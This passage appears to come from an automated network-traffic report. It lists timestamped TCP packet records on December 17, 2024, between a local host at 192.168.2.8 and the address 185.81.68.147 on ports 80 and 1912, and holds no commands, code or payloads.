                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.580516100 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.581284046 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.581391096 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.581913948 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.582207918 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.582330942 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.582813978 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.583201885 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.583340883 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.583656073 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.584124088 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.584223032 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.584287882 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.585057020 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.585155010 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.585434914 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.586030006 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.586144924 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.586251020 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.586978912 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.587069035 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.587316036 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.588023901 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.588058949 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.588119984 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.589134932 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.589169025 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.589323044 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.589987993 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.590122938 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.590215921 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.590776920 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.590892076 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.591000080 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.591716051 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.591892004 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.592103004 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.592700005 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.592735052 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.592796087 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.594068050 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.594234943 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.594300032 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.595077991 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.595220089 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.595283031 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.596525908 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.596640110 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.596797943 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.597459078 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.597575903 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.597644091 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.598217010 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.598304987 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.598366976 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.598957062 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.598992109 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.599092007 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.599661112 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.599725008 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.599812031 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.600321054 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.600486040 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.600548983 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.601278067 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.601399899 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.601731062 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.602221012 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.602344036 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.602417946 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.603266001 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.603466988 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.603569031 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.604142904 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.604193926 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.604295015 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.605079889 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.605206966 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.605268955 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.606030941 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.606143951 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.606220007 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.606961966 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.607098103 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.607198000 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.607903957 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.607958078 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.608088970 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.608983994 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.609177113 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.609256029 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.609833956 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.609977007 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.610042095 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.610763073 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.611033916 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.611123085 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.611695051 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.613501072 CET497101912192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.660387039 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.671197891 CET497101912192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.763205051 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.763328075 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.763570070 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.763704062 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.763803005 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.763864994 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.764614105 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.764734030 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.764863014 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.765547037 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.765625954 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.765707016 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.766506910 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.766603947 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.766782999 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.767437935 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.767508030 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.767591953 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.768372059 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.768455029 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.768508911 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.769335985 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.769447088 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.769498110 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.770277023 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.770392895 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.770483017 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.771203995 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.771377087 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.771456957 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.772273064 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.772351980 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.772414923 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.773160934 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.773176908 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.773308992 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.774122000 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.774236917 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.774487019 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.775022030 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.775156021 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.775331974 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.776007891 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.776113987 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.776375055 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.776983976 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.777036905 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.777087927 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.777928114 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.777956963 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.778033972 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.778860092 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.779016972 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.779086113 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.779824972 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.779951096 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.780035019 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.780792952 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.780904055 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.780988932 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.781821012 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.781920910 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.782016993 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.782789946 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.782824993 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.782932043 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.783662081 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.783776999 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.783845901 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.784586906 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.784696102 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.784792900 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.785531044 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.785648108 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.785696030 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.786536932 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.786613941 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.786691904 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.787518024 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.787651062 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.787695885 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.788409948 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.788522959 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.788583994 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.789382935 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.789475918 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.789777994 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.790402889 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.790484905 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.790544987 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.791280985 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.791429996 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.791497946 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.792398930 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.792519093 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.792570114 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.792697906 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.792751074 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.792759895 CET497101912192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.792803049 CET497101912192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.792866945 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.792895079 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.792947054 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.792957067 CET497101912192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.792975903 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.792993069 CET497101912192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.793046951 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.793071985 CET497101912192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.793148041 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.793179989 CET497101912192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.793248892 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.793328047 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.793807030 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.793862104 CET497101912192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.793880939 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.793915987 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.793927908 CET497101912192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.793968916 CET497101912192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.794101000 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.794262886 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.794332981 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.795077085 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.795139074 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.795219898 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.796036005 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.796133995 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.796365976 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.796960115 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.797081947 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.797241926 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.798024893 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.798063993 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.798134089 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.798855066 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.799009085 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.799088955 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.799822092 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.799911022 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.799962997 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.800759077 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.800846100 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.800894976 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.801846027 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.801950932 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.802006960 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.802768946 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.802901030 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.802979946 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.803608894 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.803781986 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.803899050 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.804634094 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.804685116 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.804781914 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.805560112 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.805639982 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.805773020 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.806478024 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.806602001 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.806730986 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.807416916 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.807559967 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.807637930 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.808446884 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.808522940 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.808576107 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.809351921 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.809520006 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.809585094 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.810328007 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.810445070 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.810513020 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.811290026 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.811480045 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.811566114 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.812202930 CET8049709185.81.68.147192.168.2.8
